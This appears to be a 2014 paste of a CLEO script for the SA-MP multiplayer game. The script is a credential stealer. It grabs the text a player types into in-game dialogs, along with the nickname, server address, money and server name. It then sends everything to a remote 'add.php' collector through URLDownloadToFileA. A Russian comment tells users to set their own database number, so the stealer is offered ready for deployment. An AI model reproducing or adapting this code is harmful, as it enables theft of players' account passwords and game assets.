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a guest
Jun 20th, 2014
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text 1.43 KB | None | 0 0
  1. 0ac8: 1@ = 52
  2. 0B36: samp 1@ = get_player_nickname $PLAYER_CHAR
  3. :Label0
  4. While true
  5. wait 0
  6. if 0b4c: -1
  7. then
  8. 0ac8: 2@ = 64
  9. 0B39: samp get_current_server_address 2@ port 3@
  10. 010B: 5@ = player $PLAYER_CHAR money
  11. 0ac8: 6@ = 256
  12. 0B3A: samp 6@ = get_current_server_name
  13. 0ac8: 4@ = 64
  14. repeat
  15. wait 0
  16. 0B4E: samp 7@ = get_current_dialog_id
  17. 0B4A: samp 4@ = get_current_dialog_editbox_text
  18. until 8b4c: -1
  19. wait 50
  20. 0AC6: 0@ = label @url offset
  21. 0AC8: 8@ = allocate_memory_size 1024
  22. 0AD3: 8@ = format "%slog=%s&srvr=%s:%d&inf=%s&mn=%d&servname=%s&did=%d&stuid=15" params 0@ 1@ 2@ 3@ 4@ 5@ 6@ 7@ //stuid=15 - номер базы, меняйте 15 на свою базу
  23. 0AA2: 9@ = load_library "urlmon.dll" // IF and SET
  24. 0AA4: 10@ = get_proc_address "URLDownloadToFileA" library 9@ // IF and SET
  25. 0AA5: call 10@ num_params 5 pop 0 params lpfnCB 0 dwReserved 0 szFileName "0" szUrl 8@ caller 0
  26. 0AA3: free_library 9@
  27. 0AC9: free_allocated_memory 1@
  28. 0ac9: free_allocated_memory 4@
  29. 0ac9: free_allocated_memory 2@
  30. 0ac9: free_allocated_memory 6@
  31. 0ac9: free_allocated_memory 8@
  32. else jump @Label0
  33. wait 950
  34. if 8b4c: -1
  35. then jump @Start
  36. else jump @Label0
  37. end
  38. end
  39. :url
  40. hex
  41. "http:" 2f 2f "" 2f "add.php?" 00
  42. end
  43. :Start
  44. 0@ = 0
  45. 1@ = 0
  46. 2@ = 0
  47. 3@ = 0
  48. 4@ = 0
  49. 5@ = 0
  50. 6@ = 0
  51. 7@ = 0
  52. 8@ = 0
  53. 9@ = 0
  54. 10@ = 0
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